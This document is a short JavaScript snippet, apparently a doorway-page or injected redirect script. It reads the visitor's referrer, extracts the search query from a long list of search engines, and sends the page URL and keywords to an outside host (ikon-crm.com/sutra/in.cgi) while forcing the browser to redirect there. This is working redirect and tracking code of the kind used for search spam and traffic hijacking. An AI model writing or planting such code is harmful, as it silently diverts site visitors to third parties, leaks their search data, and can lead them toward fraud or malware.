var k = "new+york+city+board+of+education";
var currurl = escape(top.document.location);
var pinfo = currurl.split("/");
var page = pinfo[pinfo.length-1];
if (page.indexOf('.html')!=-1 && page != 'index.html'){
   var key = page.substr(0, page.length - 5);
   var words = key.split("-");
   key = words.join("+");
}else{
   key = k;
}

r=document.referrer;
u=document.URL;
t="";
se="unknown";
function a(c,d,e){if(r.indexOf(c)!=-1){t=d;se=e;}}
a("google.","q","google");
a("msn.","q","msn");
a("yahoo.","p","yahoo");
a("altavista.","q","altavista");
a("aol.","query","aol");
a("ask.","q","ask");
a("eureka.com.","q","eureka.com");
a("lycos.com.","query","lycos");
a("hotbot.com.","MT","hotbot");
a("infoseek.com.","qt","infoseek.com");
a("webcrawler.","searchText","webcrawler");
a("excite.","search","excite");
a("netscape.com.","search","netscape");
a("mamma.com.","query","mamma");
a("alltheweb.com.","query","alltheweb.com");
a("northernlight.com.","qr","northernlight.com");
a("rambler.ru.","words","rambler.ru");
a("aport.ru.","r","aport.ru");
a("yandex.ru.","text","yandex.ru");
a("pingwin.ru.","searchword","pingwin.ru");
a("www.ru.","Str_Find","www.ru");
a("punto.ru.","text","punto.ru");
a("seo","q","localhost");              
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))k=r.substring(q+2+t.length).split("&")[0];
var g = "http://ikon-crm.com/sutra/in.cgi?two&HTTP_REFERER="+se+";"+u+"&ur=1&parameter="+key;

window.location=g;

